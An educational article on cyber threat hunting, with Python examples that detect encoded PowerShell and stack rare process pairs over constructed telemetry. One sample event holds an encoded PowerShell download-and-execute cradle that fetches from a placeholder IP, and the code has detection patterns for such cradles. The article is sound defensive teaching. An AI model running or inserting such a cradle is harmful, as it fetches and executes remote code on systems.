# What is cyber threat hunting?

## Security monitoring

**Cybersecurity monitoring** has traditionally been **reactive**: detections are **based on signatures, hashes and heuristics** built into the security solutions in use, so activity has to match something already known before it produces an alert

SIEM use cases give a SOC a way to detect threats through custom correlation of suspicious activity within the organization, but they are still reactive in nature: the correlation rule has to exist before the activity can raise an alert

A SOC analyst reviews alerts coming into a SIEM or similar solution, analyzes them and responds accordingly

### Challenges

**Unknown threats bypass traditional security controls** and remain in the environment, sometimes until they're noticed by an external party rather than by the organization itself

Sophisticated attackers have the tools and the skill set to bypass traditional defenses

SOC analysts may deal with **alert fatigue due to too many alerts** generated by the various security solutions

**Visibility gaps** in the environment will **degrade the detection** process as you can't monitor what you can't see

## What is threat hunting?

**Threat hunting** is a proactive, rather than reactive, approach to identifying threats in an environment

It utilizes a **hypothesis-based, analyst-driven approach** to identify, prioritize, execute, record and report hunts in the environment

The goal of threat hunting is to **identify potential threats** before they can cause harm, by using various techniques, methodologies and hypothesis-driven investigation

It enhances the security posture of your organization by identifying threats that are not detected through traditional avenues

### Why is it important?

The cost of a data breach reached an all-time high in 2022, averaging USD 4.35 million (the figures in this section are from the IBM Cost of a Data Breach Report 2022)

The average time to identify and contain a data breach was **277 days**

**Proactive strategies reduce response times and fiscal impacts**:

* Organizations with XDR technologies identified and contained a breach 29 days faster than those without
* Average breach cost reduction with security AI/automation: USD 3.05 million
* Average breach cost reduction with an incident response (IR) team and a regularly tested IR plan: USD 2.66 million
* Average cost savings associated with a zero-trust deployment: USD 1 million

## Who is a threat hunter?

A **cybersecurity professional** who proactively seeks to uncover threats in an environment that existing detection controls have not caught

Someone who is well-versed in **security analysis** and has **domain knowledge** to distinguish normal from suspicious behavior

Uses various **threat hunting sources** to identify potential hunts, **develops a hypothesis** to **guide each hunt, then executes and reports** on it

Uses various **threat hunting methodologies and techniques** to uncover threats in the environment that are not detected via existing detection mechanisms
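The hypothesis-based approach described under "What is threat hunting?" and the hunter's workflow above (source, hypothesis, execution, record, report) as one worked hunt. This is an added example, not code from the original page: the hypothesis record, the event field names and the process-creation events are constructed for illustration, and the hunt identifier `HUNT-0001` is made up. The hypothesis is that an adversary is running Base64-encoded PowerShell, so the hunt decodes every `-EncodedCommand` argument it finds and records what the script actually does rather than stopping at "encoded command seen".

```python
"""Hypothesis-driven hunt run over constructed process-creation events (added example)."""
import base64
import re

# The hypothesis record: where the hunt came from, the claim under test and the data it needs.
HYPOTHESIS = {
    "id": "HUNT-0001",  # constructed identifier
    "source": "MITRE ATT&CK",
    "technique": "T1059.001 (PowerShell) with T1027 (Obfuscated Files or Information)",
    "statement": "An adversary is launching PowerShell with an encoded command to hide the script body",
    "data": "process creation events: host, user, parent image, image, command line",
}


def _enc(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; the field names are assumptions, not a real EDR schema.
EVENTS = [
    {"host": "WS01", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "WS02", "user": "bob", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')")},
    {"host": "SRV01", "user": "svc_backup", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\backup\\run.ps1"},
    {"host": "WS03", "user": "carol", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _enc("Write-Host hello")},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; match the forms commonly seen.
ENC_ARG = re.compile(r"(?i)\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CRADLE = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest)\b")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # not valid Base64: leave it for manual review rather than crash the hunt
        return None
    return raw.decode("utf-16-le", errors="replace")


def run_hunt(events):
    """Execute the hunt: test each event against the hypothesis and record every match."""
    findings = []
    for ev in events:
        if ev["image"].lower() != "powershell.exe":
            continue
        script = decode_encoded_command(ev["cmdline"])
        if script is None:
            continue
        indicators = []  # context that separates a benign encoded command from one worth escalating
        if ev["parent"].lower() in OFFICE_PARENTS:
            indicators.append("office-parent")
        if CRADLE.search(script):
            indicators.append("download-cradle")
        if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", ev["cmdline"]):
            indicators.append("hidden-window")
        findings.append({"hunt": HYPOTHESIS["id"], "host": ev["host"], "user": ev["user"],
                         "parent": ev["parent"], "decoded": script, "indicators": indicators})
    return findings


def hunt_report(findings):
    """Summarise the hunt so the outcome is recorded whether or not the hypothesis held."""
    escalate = [f for f in findings if f["indicators"]]
    return {
        "hunt": HYPOTHESIS["id"],
        "technique": HYPOTHESIS["technique"],
        "events_matched": len(findings),
        "escalate_to_ir": sorted({f["host"] for f in escalate}),
        "benign_explained": sorted({f["host"] for f in findings if not f["indicators"]}),
        "outcome": "confirmed" if escalate else "not confirmed",
    }


if __name__ == "__main__":
    for f in run_hunt(EVENTS):
        print(f["host"], f["indicators"], f["decoded"])
    print(hunt_report(run_hunt(EVENTS)))
```

Two of the four events carry an encoded command. WS03 decodes to a harmless `Write-Host` and is recorded as explained; WS02 decodes to a download cradle launched hidden from Word and is escalated. A negative result (no findings) is still written up, because a hunt that found nothing on good data is evidence about coverage, not wasted effort.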

## Threat hunting sources

Threat hunters rely on different sources of information to create hunts, such as the following:

### Threat intelligence

**Collection of data related to known threats and threat actors**

* Threat actors targeting your organization
* Information sharing between organizations within the same sector
* Zero-day exploits against similar organizations
* New vulnerabilities being leveraged by attackers

### Internal findings

The **findings identified** by various teams conducting assessments

* Internal audit
* Enterprise risk teams
* Red Team

### Security incidents

The lessons-learned phase of incident response captures valuable information that threat hunting can leverage: tactics and techniques identified during the response, gaps in coverage, vulnerabilities, etc.

### MITRE ATT\&CK framework

Tactics and techniques outlined in the framework are great resources to identify and prioritize hunts to be conducted within your organization

### Organizational knowledge

Knowledge of known gaps, broken processes, etc. that comes from time spent with an organization is another great source for threat hunting

### Anomalous activity

Activity that deviates from established security configurations or behaviors is another input for threat hunting
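One common way to surface behavior that deviates from the fleet's baseline is stacking (least-frequency-of-occurrence analysis): count how many hosts each parent/child process pair runs on and review the pairs seen on only one or two. This is an added example and not code from the original page; the host inventory, the events and the known-good baseline are constructed for illustration, and the coverage check at the end reflects the visibility-gap point made earlier on this page (a host that sends no telemetry cannot be hunted).

```python
"""Stacking rare parent/child process pairs across a fleet (added example)."""
from collections import defaultdict

# Constructed process-creation events: (host, parent image, child image).
# Host names, images and counts are made up; the tuple shape is an assumption, not a real schema.
EVENTS = [
    *[(h, "services.exe", "svchost.exe") for h in ("WS01", "WS02", "WS03", "WS04", "WS05", "WS06")],
    *[(h, "explorer.exe", "outlook.exe") for h in ("WS01", "WS02", "WS03", "WS04", "WS05", "WS06")],
    *[(h, "explorer.exe", "chrome.exe") for h in ("WS01", "WS02", "WS03", "WS05")],
    ("WS04", "WINWORD.EXE", "cmd.exe"), ("WS04", "WINWORD.EXE", "cmd.exe"),  # Office spawning a shell, one host
    ("WS02", "svchost.exe", "rundll32.exe"),                                  # a single rundll32 launch
    ("SRV01", "backupagent.exe", "powershell.exe"), ("SRV01", "backupagent.exe", "powershell.exe"),
]

# Constructed inventory of hosts that should be reporting telemetry.
EXPECTED_HOSTS = {"WS01", "WS02", "WS03", "WS04", "WS05", "WS06", "WS07", "SRV01"}

# Known-good pairs from organisational knowledge (here: the backup job runs PowerShell by design).
BASELINE = {("backupagent.exe", "powershell.exe")}


def stack(events):
    """Per parent/child pair, count the distinct hosts it ran on and the total executions."""
    hosts = defaultdict(set)
    total = defaultdict(int)
    for host, parent, child in events:
        key = (parent.lower(), child.lower())  # normalise case so WINWORD.EXE and winword.exe stack together
        hosts[key].add(host)
        total[key] += 1
    return {key: (len(hosts[key]), total[key]) for key in hosts}


def rare_pairs(events, max_hosts=1, baseline=BASELINE):
    """Pairs outside the baseline seen on at most max_hosts hosts, rarest first."""
    counts = stack(events)
    rare = [(key, host_count, executions) for key, (host_count, executions) in counts.items()
            if host_count <= max_hosts and key not in baseline]
    rare.sort(key=lambda r: (r[1], r[2], r[0]))  # fewest hosts, then fewest executions, then name
    return rare


def visibility_gaps(events, expected_hosts=EXPECTED_HOSTS):
    """Inventory hosts that sent no telemetry: the hunt can say nothing about them."""
    seen = {host for host, _, _ in events}
    return sorted(expected_hosts - seen)


if __name__ == "__main__":
    for (parent, child), host_count, executions in rare_pairs(EVENTS):
        print(f"{parent} -> {child}: {host_count} host(s), {executions} execution(s)")
    print("no telemetry from:", visibility_gaps(EVENTS))
```

The two pairs that come out are `svchost.exe -> rundll32.exe` on one host and `WINWORD.EXE -> cmd.exe` on one host; the backup agent's PowerShell launch is equally rare but is excluded because organisational knowledge already explains it. Rarity is a triage signal, not a verdict: each surviving pair still needs the command line and context looked at, and the `WS07` gap means the fleet-wide counts are incomplete.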
